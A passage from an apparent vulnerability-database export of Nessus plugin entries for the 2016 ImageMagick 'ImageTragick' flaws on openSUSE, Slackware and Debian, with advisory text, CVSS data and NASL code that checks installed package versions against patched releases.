build < fix_build\n )\n vuln = TRUE;\n\nif (vuln)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n items = make_array(\"Installed version\", display_version,\n \"Fixed version\", display_fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:30:25", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 21, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libMagick++-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:libMagick++-devel"], "id": "OPENSUSE-2016-574.NASL", "href": "https://www.tenable.com/plugins/nessus/90986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-574.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90986);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-574 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debugsource-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:53", "description": "New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.", "edition": 24, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "title": "Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-12T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:imagemagick", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird"], "id": "SLACKWARE_SSA_2016-132-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-132-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91046);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"SSA\", value:\"2016-132-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.359500\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a01f0c3\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27bd7c00\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick and / or mozilla-thunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:49:37", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or\ndelete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.", "edition": 25, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "title": "Debian DSA-3580-1 : imagemagick - security update (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-17T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:imagemagick"], "id": "DEBIAN_DSA-3580.NASL", "href": "https://www.tenable.com/plugins/nessus/91175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3580. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91175);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"DSA\", value:\"3580\");\n\n script_name(english:\"Debian DSA-3580-1 : imagemagick - security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or\ndelete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the imagemagick packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 8:6.8.9.9-5+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-6.q16\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-common\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-doc\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-q16-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-5\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-arch-config\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2-extra\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", 